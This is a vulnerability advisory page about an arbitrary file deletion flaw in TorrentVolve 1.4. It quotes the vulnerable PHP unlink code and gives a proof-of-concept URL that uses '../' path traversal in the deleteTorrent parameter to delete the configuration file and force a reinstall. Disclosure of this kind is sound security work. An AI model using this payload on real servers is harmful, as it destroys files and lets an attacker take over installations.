TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability

2009.06.23
Credit: br0ly
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

---------------------------------------------------------------------------------------------------- Name : Torrent Volve Site : http://sourceforge.net/projects/torrentvolve/ Down : http://sourceforge.net/project/showfiles.php?group_id=179905&package_id=207933&release_id=476030 ---------------------------------------------------------------------------------------------------- Found By : br0ly Made in : Brasil Contact : br0ly[dot]Code[at]gmail[dot]com ---------------------------------------------------------------------------------------------------- Description: Bug : Delete Arbitrary file. Look this in: archive.php; Lines 194 - 199 if(isset($_GET['deleteTorrent'])) { //delete Torrent from file system unlink($userDir . '/' . $_GET['deleteTorrent']); echo ' <div class="divStatus">' . $_GET['deleteTorrent'] . ' deleted.</div>' . "\n"; } Then after login we can delete files, if you delete the configuration file you can install the script again. ---------------------------------------------------------------------------------------------------- P0c: http://localhost/Scripts/torrentvolve/archive.php?deleteTorrent=../../../config/configuration.xml To install again go to: http://localhost/Scripts/torrentvolve/ OBS: need register_globals=on; ----------------------------------------------------------------------------------------------------

References:

http://xforce.iss.net/xforce/xfdb/51088
http://www.milw0rm.com/exploits/8931


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top